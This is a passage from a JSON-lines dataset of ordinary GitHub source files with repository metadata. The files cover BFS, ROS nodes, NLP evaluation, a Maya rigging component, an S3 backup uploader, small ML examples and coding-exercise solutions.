'''\n    G = [] \n\n    file=open('input.txt','r')\n    for line in file:\n        line=line.strip()\n        adjacentVertices = []\n        first=True\n        for node in line.split(' '):\n            if first:\n                first=False\n                continue\n            adjacentVertices.append(int(node))\n        G.append(adjacentVertices)\n\n    file.close()\n\n    s = int(input(\"Enter the source \"))\n    graph = Graph(G)\n    graph.bfs(s) \n\nif __name__ == '__main__':\n\n    main()","repo_name":"harshagrwl/4th-Semester-Labs","sub_path":"DSA/Lab3/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"}
{"seq_id":"39212351323","text":"#! /usr/bin/env python3\n\n######################################################\n# Name: Hany Ali Elesawy\n# Date: 2022.09.08\n# Topic: ROS2Lab day 07\n#\n##########################\n#\n# node1 (str_publisher) tasks:\n#\n# \tpublish \"str_topic\" --> (“<name> is publish <counter>”) and update the counter every 1 second\n#\tsubscribe to \"reset_flag\"\n#\n##########################\n# \n# node2 (\"number_counter\") tasks:\n#\n#\tsubscribe to \"str_topic\"\n#\tpublish \"reset_flag\" --> is set to True when the counter from node1 reaches a value of 5\n#\n######################################################\n\n\nimport rclpy\nfrom rclpy.node import Node\n\nfrom std_msgs.msg import String\n\nfrom std_msgs.msg import Bool\n\nclass my_node1(Node):\n\t\n\tdef __init__(self):\n\t\tsuper().__init__(\"str_publisher\")\n\t\t\n\t\tself.counter = 0\n\t\tself.Globalcounter = 0\n\t\ttimer_period = 1\n\t\t\n\t\t\n\t\tself.create_timer(timer_period, self.timerCallback)\n\t\t\n\t\tself.pub = self.create_publisher(String, \"str_topic\", 10)\n\n\t\tself.sub = self.create_subscription(Bool, \"reset_flag\", self.node1_SubCallback,10)\n\t\t\n\t\t\n\tdef timerCallback(self):\n\t\t\n\t\tstr_msg = String()\n\t\t\n\t\tstr_msg.data = f\"Hany Elesawy is publishing... 
, {self.counter}\"\n\t\tself.pub.publish(str_msg)\n\t\t\n\t\tprint(f\"Node 1 publish tick {self.Globalcounter}\")\n\t\t\n\t\tself.counter += 1\n\t\tself.Globalcounter += 1\n\t\t\n\t\t\n\tdef node1_SubCallback(self, msg):\n\t\t\n\t\tif msg.data == True: \t\t\t\t\t#if resetflag == true --> reset \n\t\t\tself.counter = 0\n\t\t\n\t\t\ndef main(args=None):\n\n\trclpy.init(args=args)\n\t\n\tnode1 = my_node1()\n\t\t\n\trclpy.spin(node1)\n\n\trclpy.shutdown()\n\t\t\nif __name__ == \"__main__\":\n\tmain()\n\t\t\n","repo_name":"H3EsAwY/ITI_Robotics_Course2022","sub_path":"Day_07/ITI_Lab_Day_07/ITI_Lab_Day_07/node1.py","file_name":"node1.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"13531591134","text":"# operation system\nimport os\n# regular expression\nimport re\n# retrives file support\nimport glob\n# make a table\nimport pandas as pd\n# regular expression\nimport re\n\n#function to compare columns NE-COARSE-LIT x GOLD\ndef compare(x): \n\treturn '1' if x['PREDICTION'] == x['GOLD'] else 'O'\n\n# input directory\npath_hand = r'/Users/alexsoares/Desktop/EHESS/dev/Savoirs_Spacy/hand_pandas' # use your path\npath_clean = r'/Users/alexsoares/Desktop/EHESS/dev/Savoirs_Spacy/SpaCy_BIO/SpaCy_sm_BIO/' \n\n# inform the path\nfor file_path in glob.iglob(path_hand + \"/*.txt\"):\n\t#transform path into a readable file\n\tf_hand = file_path\n\t\n\t# open the variable to be read and split into words\n\twith open(f_hand, 'r', encoding='utf8') as f:\n\t\tt_hand = f.read()\n\t\tfor f_path in glob.iglob(path_clean + \"/*.txt\"):\n\t\t\t\n\t\t\t#transform path into a readable file\n\t\t\tf_clean = f_path\n\t\t\tf_clean_part = os.path.basename(f_clean.replace(\"_text_SpaCy_sm_BIO.txt\", \"\"))\n\t\t\tf_hand_part = os.path.basename(f_hand.replace(\"_text_beyond_hand_BIO.txt\", \"\"))\n\t\t\tif (f_clean_part == f_hand_part):\n\t\t\t\t#print(f_clean_part)\n\t\t\t\t#print(f_hand_part)\n\t\t\t\t\n\t\t\t\t# open the variable to be read and split into words\n\t\t\t\twith open(f_clean, 'r', encoding='utf8') as f_BIO:\n\t\t\t\t\t# read and split into words to count word in file\n\t\t\t\t\tt_clean = f_BIO.read()\n\t\t\t\t\t#print(t_clean) \t\t\t\t\n\t\t\t\t\t#### PANDAS ####\n\t\t\t\t\tdf_hand = pd.read_csv(f_hand, sep=\"\\t\", names=[\"TOK\"])\n\t\t\t\t\t#print(df_hand)\n\t\t\t\t\tdf_clean = pd.read_csv(f_clean, sep=\"\\t\", names=[\"TOKEN\", \"PREDICTION\", \"GOLD\", \"VALIDITY\"])\n\t\t\t\t\t#print(df_clean)\n\t\t\t\t\t# convert the dictionary into DataFrame\n\t\t\t\t\ttable_clean = pd.DataFrame(df_clean)\n\t\t\t\t\t#print(table_clean)\n\t\t\t\t\ttable_hand = pd.DataFrame(df_hand)\n\t\t\t\t\t#print(table_hand)\n\t\t\t\t\t# split the column TOK in two GOLD with the IOB format and TOK_ with the tokenized text\n\t\t\t\t\ttable_hand[['TOK_','GOLD_bio']] = table_hand.TOK.str.split(\" \",expand=True,)\n\t\t\t\t\t#df['columnF'] = pd.Series(df1['columnF'])\n\t\t\t\t\ttable_clean['GOLD']=pd.Series(table_hand['GOLD_bio'])\n\t\t\t\t\t# delete the index\n\t\t\t\t\tblankIndex=[''] * len(table_clean)\n\t\t\t\t\ttable_clean.index=blankIndex\n\t\t\t\t\t\n\t\t\t\t\t# delete the column from TABLE_HAND previews columns\n\t\t\t\t\tdel table_hand ['TOK']\n\t\t\t\t\tdel table_hand ['TOK_']\n\t\t\t\t\t\n\t\t\t\t\t# it allows to display entire table\n\t\t\t\t\tpd.set_option(\"display.max_rows\", None, \"display.max_columns\", None )\n\t\t\t\t\ttable_clean['VALIDITY'] = table_clean.apply(compare, 
axis=1)\n\n\t\t\t\t\t#print(table_clean)\n\t\t\t\t\t\n\t\t\t\t\t# directory out\n\t\t\t\t\toutput_dir = \"/Users/alexsoares/Desktop/EHESS/dev/Savoirs_Spacy/db_results/SpaCy_prediction/prediction_sm/\"\n\t\t\t\t\t# new files out with original's name plus _text and its new format .txt\n\t\t\t\t\tresults_file = \"%s%s_prediction.tsv\"%(output_dir, os.path.splitext(os.path.basename(f_clean))[0])\n\t\t\t\t\tprint(results_file)\n\t\t\t\t\t\n\t\t\t\t\t# write to files\n\t\t\t\t\twith open(results_file,'w') as write_csv:\n\t\t\t\t\t\twrite_csv.write(table_clean.to_csv(sep='\\t', index=False))\n\t\t\t\t\t#print(write_csv)\n\t\t\t\t\t\t\n\n\t\t\t\t\t\n\n\t\t\t\t\t\n\n\t\t\t\t\t\n","repo_name":"PSIG-EHESS/SavoirsEN","sub_path":"ScriptPython/SpaCY_prediction_.py","file_name":"SpaCY_prediction_.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"6416594844","text":"#!/usr/bin/env python\r\n# Software License Agreement (BSD License)\r\n#\r\n# Copyright (c) 2016, HLP-R\r\n# All rights reserved.\r\n#\r\n# Redistribution and use in source and binary forms, with or without\r\n# modification, are permitted provided that the following conditions\r\n# are met:\r\n#\r\n# * Redistributions of source code must retain the above copyright\r\n# notice, this list of conditions and the following disclaimer.\r\n# * Redistributions in binary form must reproduce the above\r\n# copyright notice, this list of conditions and the following\r\n# disclaimer in the documentation and/or other materials provided\r\n# with the distribution.\r\n# * Neither the name of Willow Garage, Inc. nor the names of its\r\n# contributors may be used to endorse or promote products derived\r\n# from this software without specific prior written permission.\r\n#\r\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\r\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\r\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\r\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\r\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\r\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\r\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\r\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\r\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\r\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\r\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\r\n# POSSIBILITY OF SUCH DAMAGE.\r\n#\r\n# A script to use pocketsphinx's \"keyphrase spotting\" feature with \r\n# python and ros. 
Note that it\r\n#\r\n# Authors: Baris Akgun, Priyanka Khante\r\n# Edited: Vivian Chu, 8-29-16 - rosparam and multiple yaml files\r\n#\r\n# A convenience class to map speech recognition result to commands \r\n# while keeping the time stamp.\r\n#\r\n# Note that currently the mapping is done by hand\r\n\r\nimport rospy\r\nimport rosgraph\r\nimport rospkg\r\nimport socket\r\nimport yaml\r\nfrom std_msgs.msg import String\r\nfrom hlpr_speech_msgs.msg import StampedString, SpeechCommand\r\nfrom hlpr_speech_msgs.srv import SpeechService\r\n\r\nclass SpeechListener:\r\n\r\n COMMAND_TOPIC_PARAM = \"/speech/publish_topic\"\r\n SERVICE_TOPIC_PARAM = \"/speech/service_topic\"\r\n KEYWORDS_PARAM = \"/speech/keywords\"\r\n COMMAND_TYPE = \"/speech/command_type\"\r\n LEAVE_COMMAND = \"/speech/leave_command\"\r\n\r\n def __init__(self, commandBuffSize=10, init_node=True):\r\n\r\n if (init_node):\r\n # initialize the ros node\r\n rospy.init_node(\"speech_listener\")\r\n \r\n # Default values for speech listener\r\n rospack = rospkg.RosPack()\r\n default_pub_topic = 'hlpr_speech_commands'\r\n default_yaml_files = [rospack.get_path('hlpr_speech_recognition')+'/data/kps.yaml']\r\n default_service_topic = 'get_last_speech_cmd'\r\n\r\n # Pull values from rosparam\r\n self.recog_topic = rospy.get_param(SpeechListener.COMMAND_TOPIC_PARAM, default_pub_topic)\r\n self.yaml_files = rospy.get_param(\"~yaml_list\", default_yaml_files)\r\n self.service_topic = rospy.get_param(SpeechListener.SERVICE_TOPIC_PARAM, default_service_topic)\r\n self.msg_type = eval(rospy.get_param(SpeechListener.COMMAND_TYPE, 'StampedString')) # True if message is only str, false includes header\r\n self.leave_command_flag = rospy.get_param(SpeechListener.LEAVE_COMMAND, False) #do we care if we the last command is old\r\n\r\n rospy.Subscriber(self.recog_topic, self.msg_type, self.callback)\r\n\r\n # Converts the yaml files into keywords to store into the dictionary\r\n self.keywords_to_commands = {}\r\n for kps_path in self.yaml_files:\r\n for data in yaml.load_all(file(kps_path,'r')):\r\n self.keywords_to_commands[str(data['tag'])] = data['speech']\r\n\r\n # Store this on the rosparam server now\r\n rospy.set_param(SpeechListener.KEYWORDS_PARAM, self.keywords_to_commands)\r\n\r\n self._commandBuffSize = commandBuffSize\r\n #self.commandsQueue = deque(maxlen=self._commandBuffSize)\r\n\r\n # Flags for starting/stopping the node\r\n self.spinning = False\r\n self.last_command_fresh = False\r\n self.last_command = None\r\n self.last_ts = None\r\n self.last_string = None\r\n\r\n # Setup service call\r\n s = rospy.Service(self.service_topic, SpeechService, self.get_last_command)\r\n rospy.loginfo(\"Speech listener initialized\")\r\n\r\n # The following function is called each time, for every message\r\n def callback(self, msg):\r\n\r\n if self.msg_type == StampedString:\r\n self.last_string = msg.keyphrase\r\n self.last_ts = msg.stamp\r\n else:\r\n self.last_string = msg.data\r\n\r\n self.last_command = self._map_keyword_to_command(self.last_string)\r\n self.last_command_fresh = True\r\n if self.spinning:\r\n rospy.loginfo(rospy.get_caller_id() + ' I heard %s', str(self.last_command))\r\n\r\n # method to extract command string from msg\r\n def _map_keyword_to_command(self, data):\r\n for (command, keywords) in self.keywords_to_commands.iteritems():\r\n for word in keywords:\r\n if data.find(word) > -1:\r\n return command\r\n\r\n # This is now made a service call\r\n def get_last_command(self, req=None):\r\n\r\n # Check if we care how \"recent\" 
the command was\r\n        if not self.leave_command_flag:\r\n\r\n            # returns a service request error\r\n            if not self.last_command_fresh:\r\n                return None\r\n\r\n            # The command hasn't been asked for before\r\n            self.last_command_fresh = False\r\n        if (req): \r\n            return {'speech_cmd': self.last_command}\r\n        else:\r\n            return self.last_command\r\n\r\n    def get_last_string(self):\r\n        return self.last_string\r\n\r\n    def get_last_ts(self):\r\n        return self.last_ts\r\n    \r\n    # clears commands queue\r\n    def cleanup(self):\r\n        #commandsQueue.clear()\r\n        pass\r\n\r\n    def spin(self):\r\n        self.spinning = True\r\n        # if shutdown, need to clean up the commands queue\r\n        rospy.on_shutdown(self.cleanup)\r\n        rospy.spin()\r\n\r\ndef listener():\r\n    sl = SpeechListener()\r\n    sl.spin() \r\n\r\nif __name__ == '__main__':\r\n    listener()\r\n    \r\n","repo_name":"HLP-R/hlpr_speech","sub_path":"hlpr_speech_recognition/src/hlpr_speech_recognition/speech_listener.py","file_name":"speech_listener.py","file_ext":"py","file_size_in_byte":6074,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"30"}
{"seq_id":"34225338712","text":"# Right triangle\n\n# import math\n#\n# while True:\n#     a, b, c = list(map(int, input().split()))\n#\n#     if a == 0 and b == 0 and c == 0:\n#         break\n#     else:\n#         if c == math.sqrt(a**2 + b**2):\n#             print('right')\n#         elif c != math.sqrt(a**2 + b**2):\n#             print('wrong')\n\nwhile True:\n    a, b, c = map(int, input().split())\n    line = []\n    line.append(a)\n    line.append(b)\n    line.append(c)\n    if a == 0 and b == 0 and c == 0:\n        break\n    else:\n        maximum = max(line)\n        line.remove(maximum)\n\n        if pow(maximum, 2) == pow(line[0], 2) + pow(line[1], 2):\n            print('right')\n        else:\n            print('wrong')\n","repo_name":"par3k/Algorithm-Codingtest","sub_path":"BOJ_Python/4153.py","file_name":"4153.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"30"}
{"seq_id":"26718882953","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n@author : zuti\r\n@software : PyCharm\r\n@file : test_JSBSIM.py\r\n@time : 17/06/2023 23:51\r\n@desc :\r\n\r\n\"\"\"\r\nimport numpy as np\r\n\r\nfrom envs.JsbSimEnv.JsbSimEnv import EnvCore\r\n\r\nenv = EnvCore()\r\nfor t in env.state_before:\r\n    print(f'{t}')\r\n\r\n\r\n\r\naction_0 = np.array([0,0,0,0])\r\naction_1 = [0,0,0,0]\r\naction = [action_0,action_1]\r\n\r\nfor i in range(100):\r\n    [sub_agent_obs, sub_agent_reward, sub_agent_done, sub_agent_info] =env.step(action)\r\n    print(f'obs{sub_agent_obs}')\r\n    print(sub_agent_reward)\r\n\r\n","repo_name":"zuti666/MARL","sub_path":"test/testJsbsim/test_JSBSIM.py","file_name":"test_JSBSIM.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"30"}
{"seq_id":"37057142064","text":"alp={'A':1,'B':2,'C':3,'D':4,'E':5,'F':6,'G':7,'H':8,'I':9,'J':10,'K':11,'L':12,'M':13,'N':14,'O':15,'P':16,'Q':17,'R':18,'S':19,'T':20,'U':21,'V':22,'W':23,'X':24,'Y':25,'Z':26}\ndef get_names():\n    parts=[]\n    f = open('text.txt')\n    line = f.readline()\n    tmp=line.split(',')\n    for i in tmp:\n        b=i.strip('\"')\n        parts.append(b)\n    parts.sort()\n    return parts\n\n\ndef get_scores(lst):\n    su = 0\n    c = 1\n    for i in lst:\n        coin = 0\n        for j in i:\n            coin += alp[j]\n        su += coin * c\n        c += 1\n    return su\n\n\nlst = 
get_names()\nprint(get_scores(lst))\n\n\n\n\n\n\n","repo_name":"fedostep/names","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"14495792039","text":"import pymel.core as pm\nfrom luna import Logger\nimport luna_rig\nimport luna_rig.functions.attrFn as attrFn\nimport luna_rig.functions.transformFn as transformFn\n\nDEFAULT_AIM_VECTOR = transformFn.WorldVector.Z.value\nDEFAULT_UP_VECTOR = transformFn.WorldVector.Y.value\n\n\nclass EyeComponent(luna_rig.AnimComponent):\n\n @property\n def aim_control(self):\n return luna_rig.Control(self.pynode.aimControl.get())\n\n @property\n def fk_control(self):\n return luna_rig.Control(self.pynode.fkControl.get())\n # ============ Getter methods =========== #\n\n def get_aim_control(self):\n return self.aim_control\n\n def get_fk_control(self):\n return self.fk_control\n\n @classmethod\n def create(cls,\n aim_locator,\n eye_joint,\n side=\"c\",\n name=\"eye\",\n character=None,\n meta_parent=None,\n hook=0,\n aim_vector=DEFAULT_AIM_VECTOR,\n up_vector=DEFAULT_UP_VECTOR,\n target_wire=False,\n tag=\"face\"):\n # Parse arguments\n if isinstance(aim_vector, str):\n aim_vector = aim_vector.upper()\n if aim_vector not in 'XYZ':\n Logger.warning('{0}: Aim vector must be either x, y or z. Got {1}. Using default z'.format(cls.as_str(name_only=True), aim_vector))\n aim_vector = DEFAULT_AIM_VECTOR.value\n else:\n aim_vector = transformFn.WorldVector[aim_vector].value\n\n if isinstance(up_vector, str):\n up_vector = up_vector.upper()\n if up_vector not in 'XYZ':\n Logger.warning('{0}: Up vector must be either x, y or z. Got {1}. Using default y'.format(cls.as_str(name_only=True), up_vector))\n up_vector = DEFAULT_UP_VECTOR.value\n else:\n up_vector = transformFn.WorldVector[up_vector].value\n\n # Create instance, add attributes\n instance = super(EyeComponent, cls).create(meta_parent=meta_parent, side=side, name=name, hook=hook, character=character, tag=tag) # type: EyeComponent\n instance.pynode.addAttr(\"aimControl\", at=\"message\")\n instance.pynode.addAttr(\"fkControl\", at=\"message\")\n eye_joint = pm.PyNode(eye_joint)\n attrFn.add_meta_attr(eye_joint)\n\n # Controls\n fk_orient_vec = aim_vector.cross(up_vector)\n fk_control = luna_rig.Control.create(name=\"{0}_fk\".format(instance.indexed_name),\n side=instance.side,\n guide=eye_joint,\n delete_guide=False,\n parent=instance.group_ctls,\n attributes=\"trs\",\n joint=True,\n orient_axis=transformFn.get_axis_name_from_vector3(fk_orient_vec),\n shape=\"circle_pointed\")\n\n aim_control = luna_rig.Control.create(name=\"{0}_aim\".format(instance.indexed_name),\n side=instance.side,\n guide=aim_locator,\n parent=instance.group_ctls,\n delete_guide=True,\n attributes=\"t\",\n shape=\"circle\",\n orient_axis=\"z\",\n tag=\"face\")\n pm.aimConstraint(aim_control.transform, fk_control.group, aim=aim_vector, u=up_vector)\n if target_wire:\n aim_control.add_wire(fk_control.group)\n\n # Connections\n instance.connect_to_character(parent=True)\n instance.attach_to_component(meta_parent, hook)\n instance._store_bind_joints([eye_joint])\n instance._store_ctl_chain([fk_control.joint])\n instance._store_controls([fk_control, aim_control])\n aim_control.transform.metaParent.connect(instance.pynode.aimControl)\n fk_control.transform.metaParent.connect(instance.pynode.fkControl)\n\n return instance\n\n def attach_to_component(self, other_comp, hook_index=0):\n super(EyeComponent, 
self).attach_to_component(other_comp, hook_index=hook_index)\n if self.in_hook:\n pm.parentConstraint(self.in_hook.transform, self.root, mo=1)\n","repo_name":"sowwic/luna","sub_path":"luna_rig/components/eye_component.py","file_name":"eye_component.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"30"} +{"seq_id":"74761021203","text":"import subprocess\nimport boto3\nimport os\nimport threading\nimport sys\n\nclass ProgressPercentage(object):\n def __init__(self, filename, size):\n self._size = float(size)\n self._seen_so_far = 0\n self._lock = threading.Lock()\n def __call__(self, bytes_amount):\n # To simplify we'll assume this is hooked up\n # to a single filename.\n with self._lock:\n self._seen_so_far += bytes_amount\n percentage = (self._seen_so_far / self._size) * 100\n sys.stdout.write(\"... %s / %s (%.2f%%)\" % \n (self._seen_so_far, self._size, percentage))\n if (self._seen_so_far == self._size):\n sys.stdout.write(\"\\n\") \n sys.stdout.flush()\n\n\n\nclass S3Uploader:\n def __init__(self):\n pass\n\n @staticmethod\n def upload(path_to_upload, bucket):\n s3 = boto3.client('s3')\n key = os.path.basename(path_to_upload)\n size = os.path.getsize(path_to_upload)\n progress = ProgressPercentage(path_to_upload, size)\n s3.upload_file(path_to_upload, bucket, key, Callback=progress) \n head_dict = s3.head_object(Bucket=bucket, Key=key)\n if head_dict['ContentLength'] != size: \n raise Exception('got file in S3 with different size')\n","repo_name":"readdle/mysql_backup","sub_path":"src/common/S3Uploader.py","file_name":"S3Uploader.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"24751860890","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestRegressor\n\ndataset = pd.read_csv('weatherHistory.csv')\n\nx = dataset.iloc[:500, 3].values.reshape(-1, 1)\ny = dataset.iloc[:500, 5].values.reshape(-1, 1)\nprint(x)\nprint(y)\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2)\n\nregressor = RandomForestRegressor(n_estimators=20)\nregressor.fit(x_train, y_train)\n\n# Visualizing the training set results\n\nx_grid = np.arange(min(x_train), max(x_train), 0.5).reshape(-1, 1)\nplt.scatter(x_train, y_train, color=\"pink\")\nplt.plot(x_grid, regressor.predict(x_grid), color=\"blue\")\nplt.title('Humidity Vs Temperature(Training Set)')\nplt.xlabel('Humidity')\nplt.ylabel('Temperature')\nplt.show()\n\n# Visualizing the test set\nplt.scatter(x_test, y_test, color=\"pink\")\nplt.plot(x_grid, regressor.predict(x_grid), color=\"blue\")\nplt.title('Humidity Vs Temperature(Test Set)')\nplt.xlabel('Humidity')\nplt.ylabel('Temperature')\nplt.show()\n","repo_name":"rachelcynthia/Machine-Learning-Projects","sub_path":"7-Random-Forest-Regression/Example2/Example2.py","file_name":"Example2.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"25126147490","text":"import turtle\r\n\r\nclass Polygon:\r\n #must include self\r\n #every parameter after self is what we will have to include when instantiating an object\r\n #but \"size\" is a default parameter i.e. 
it will be 100 unless explicitly passed in a value\r\n    def __init__(self, sides, name, size = 100):\r\n        self.sides = sides\r\n        self.name = name\r\n        self.size = size\r\n\r\n    def draw(self):\r\n        for i in range(self.sides):\r\n            turtle.forward(self.size)\r\n            turtle.left(360 / self.sides)\r\n        turtle.done()\r\n\r\nsquare = Polygon(4, \"square\")\r\npentagon = Polygon(5, \"pentagon\")\r\n\r\n#pentagon.draw()\r\n\r\nhexagon = Polygon(6, \"hexagon\", 50)\r\n#hexagon.draw()\r\n\r\n\r\n#Inheritance\r\nclass Square(Polygon):\r\n    def __init__(self, size = 100):\r\n        # __init__ is kinda like the constructor in java\r\n        super().__init__(4, \"square\", size)\r\n\r\n    #Overriding methods, no need for override annotation i think like in Java\r\n    def draw(self):\r\n        turtle.color(\"blue\")\r\n        #remember it is \"super()\", NOT \"super\"\r\n        super().draw()\r\n\r\n\r\nsquare1 = Square(30)\r\nsquare1.draw()\r\n","repo_name":"HS116/Python-Tutorials","sub_path":"OOP_Practise.py","file_name":"OOP_Practise.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"}
{"seq_id":"8056663630","text":"import numpy as np\nfrom scipy import stats as st\n\ndata_set = [\n    364, 373, 358, 394, 378, 379, 357, 364, 350,\n    363, 392, 368, 359, 375, 399, 365, 379, 357, 380\n]\n\n\nprint(\n    f\"mean - {np.mean(data_set)}\",\n    f\"median - {np.median(data_set)}\",\n    # returns only one value-repetition occurrence for multiple occurrences\n    f\"mode - {st.mode(data_set, keepdims=True)}\",\n    f\"standard deviation - {np.std(data_set)}\",\n    sep=\"\\n\",\n)\n","repo_name":"Andriy-Makarenko/atlas_magnetics","sub_path":"nym_py_library.py","file_name":"nym_py_library.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"}
{"seq_id":"26204740486","text":"\"\"\"Test the construction of :py:class:`lmp.dset._demo.DemoDset`.\n\nTest target:\n- :py:meth:`lmp.dset._demo.DemoDset.__init__`.\n\"\"\"\n\nimport re\n\nimport lmp.dset._demo\n\n\ndef test_default_version() -> None:\n    \"\"\"Must be able to construct the default version.\"\"\"\n    dset = lmp.dset._demo.DemoDset(ver=None)\n    assert dset.ver == lmp.dset._demo.DemoDset.df_ver\n\n\ndef test_all_verions() -> None:\n    \"\"\"Must be able to construct all versions of :py:class:`lmp.dset._demo.DemoDset`.\"\"\"\n    for ver in lmp.dset._demo.DemoDset.vers:\n        dset = lmp.dset._demo.DemoDset(ver=ver)\n        assert dset.ver == ver\n        assert len(dset) > 0\n        assert all(map(lambda spl: isinstance(spl, str), dset))\n        assert all(map(lambda spl: len(spl) > 0, dset))\n\n\ndef test_consistent_format() -> None:\n    \"\"\"Must have consistent format.\"\"\"\n    pttn = re.compile(r'If you add (\\d+) to (\\d+) you get (\\d+) \\.')\n    for ver in lmp.dset._demo.DemoDset.vers:\n        for spl in lmp.dset._demo.DemoDset(ver=ver):\n            match = pttn.match(spl)\n            assert match\n\n            num_1 = int(match.group(1))\n            num_2 = int(match.group(2))\n            assert 0 <= num_1 <= 99\n            assert 0 <= num_2 <= 99\n            assert num_1 + num_2 == int(match.group(3))\n\n\ndef test_mutually_exclusive() -> None:\n    \"\"\"Different versions are mutually exclusive.\"\"\"\n    dsets = []\n    total_size = 0\n    for ver in lmp.dset._demo.DemoDset.vers:\n        dset = lmp.dset._demo.DemoDset(ver=ver)\n        total_size += len(dset)\n        dsets.append(set(dset))\n\n    # Check mutually exclusive.\n    # If different versions of dataset are mutually exclusive, then their union size must be\n    # the total number of dataset samples.\n    dset_union = set()\n    for dset in 
dsets:\n dset_union = dset_union | dset\n assert len(dset_union) == total_size\n\n\ndef test_commutative() -> None:\n \"\"\"Training and validation sets are consist of commutative pairs of additions.\"\"\"\n pttn = re.compile(r'If you add (\\d+) to (\\d+) you get \\d+ \\.')\n train = lmp.dset._demo.DemoDset(ver='train')\n valid = lmp.dset._demo.DemoDset(ver='valid')\n\n train_pool = set()\n for spl in train:\n match = pttn.match(spl)\n num_1 = match.group(1)\n num_2 = match.group(2)\n train_pool.add((num_1, num_2))\n\n # If `a + b` is in training set, then `b + a` must be in validation set.\n for spl in valid:\n match = pttn.match(spl)\n num_1 = match.group(1)\n num_2 = match.group(2)\n assert (num_2, num_1) in train_pool\n\n\ndef test_multiply_by_2() -> None:\n \"\"\"Test sets are consist of a + a = 2a.\"\"\"\n pttn = re.compile(r'If you add (\\d+) to (\\d+) you get (\\d+) \\.')\n test = lmp.dset._demo.DemoDset(ver='test')\n\n for spl in test:\n match = pttn.match(spl)\n num_1 = match.group(1)\n num_2 = match.group(2)\n num_3 = match.group(3)\n assert num_1 == num_2\n assert 2 * int(num_1) == int(num_3)\n","repo_name":"ProFatXuanAll/language-model-playground","sub_path":"test/lmp/dset/_demo/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"30"} +{"seq_id":"7654960643","text":"import collections as cl\nimport math\n\nN = int(input())\n\nAB = [tuple(map(int, input().split())) for _ in range(N)]\n\n\nx = sorted([(a, 1) for a, b in AB] + [(a + b, -1) for a, b in AB])\n\nc = 0\nans = [0 for _ in range(N + 1)]\nfor i in range(len(x) - 1):\n c += x[i][1]\n ans[c] += x[i + 1][0] - x[i][0]\n\nprint(*ans[1:])\n","repo_name":"HomeSox/AtCoder","sub_path":"satory074/abc221/d/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"1277643145","text":"from itertools import product\n\nimport click\nfrom tqdm import tqdm\n\nfrom .cost import get_cost\n\n\n@click.command()\n@click.argument(\"source-currency\", type=click.STRING)\n@click.argument(\"target-amount\", type=click.STRING)\n@click.argument(\"target-currency\", type=click.STRING)\n@click.option(\"-i\", \"--pay-in-method\", type=click.STRING, default=\"VISA_CREDIT\")\n@click.option(\"-o\", \"--pay-out-method\", type=click.STRING, default=\"BALANCE\")\ndef cli(\n source_currency: str,\n target_amount: str,\n target_currency: str,\n pay_in_method: str,\n pay_out_method: str,\n):\n sources = source_currency.split(\",\")\n amounts = [float(x) for x in target_amount.split(\",\")]\n targets = target_currency.split(\",\")\n\n costs = [\n get_cost(\n source,\n float(amount),\n target,\n pay_in_method=pay_in_method,\n pay_out_method=pay_out_method,\n )\n for source, amount, target in tqdm(list(product(sources, amounts, targets)))\n ]\n\n # sort by total fee rate\n costs = sorted(costs, key=lambda x: x.price.variable_fee_percent)\n\n # print costs\n for cost in costs:\n print(cost)\n","repo_name":"narumiruna/wise","sub_path":"wise/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"41286696240","text":"import 